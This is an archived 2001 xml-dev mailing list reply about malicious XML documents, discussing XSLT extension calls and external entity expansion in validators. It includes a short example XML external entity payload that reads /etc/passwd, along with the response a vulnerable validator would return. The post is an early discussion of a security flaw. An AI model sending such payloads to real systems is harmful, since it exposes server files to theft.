OASIS Mailing List ArchivesView the OASIS mailing list archive below
or browse/search using MarkMail.

 


Help: OASIS Mailing Lists Help | MarkMail Help

 


 

   Re: [xml-dev] Malicious documents? (WAS: Interesting mailing list & a r

[ Lists Home | Date Index | Thread Index ]

Michael Kay wrote,
> I see that David's talk mentions the dangers of referring to external
> XSLT stylesheets. Until recently the W3C site provided a servlet
> which would run an XSLT transformation using a user-specified source
> document and stylesheet. By calling external Java methods from the
> stylesheet, you had total access to files on the web server.
>
> Although W3C have patched their servlet to disallow Java method
> calls, I suspect many others are still doing this.

I'm inclined to say that all bets are off with XSLT: it's code, and if 
you don't trust it you shouldn't execute it.

It's cases where there's no code as such, so no apparent danger, which 
worry me more. Nevertheless, your example of filesystem access is 
interesting. Going back to my earlier example of a validator which 
echos back the input document with external entities expanded, I wonder 
if something like the following would be a possible exploit on a 
recklessly configured system,

  <?xml version="1.0"?>
  <!DOCTYPE foo [
     <!ENTITY secret SYSTEM "file://localhost/etc/passwd">
   ]>
   <bar>&secret;</bar>

returning,

   HTTP/1.1 200 OK
   Content-Type: text/plain     

   <?xml version="1.0"?>
   <!DOCTYPE foo [
     <!ENTITY secret SYSTEM "file://localhost/etc/passwd">
   ]>
   <bar>... contents of /etc/passwd here ...</bar>
    ^^^
   Validity constraint: element "bar" not permitted here.

Cheers,


Miles




 

News | XML in Industry | Calendar | XML Registry
Marketplace | Resources | MyXML.org | Sponsors | Privacy Statement

Copyright 2001 XML.org. This site is hosted by OASIS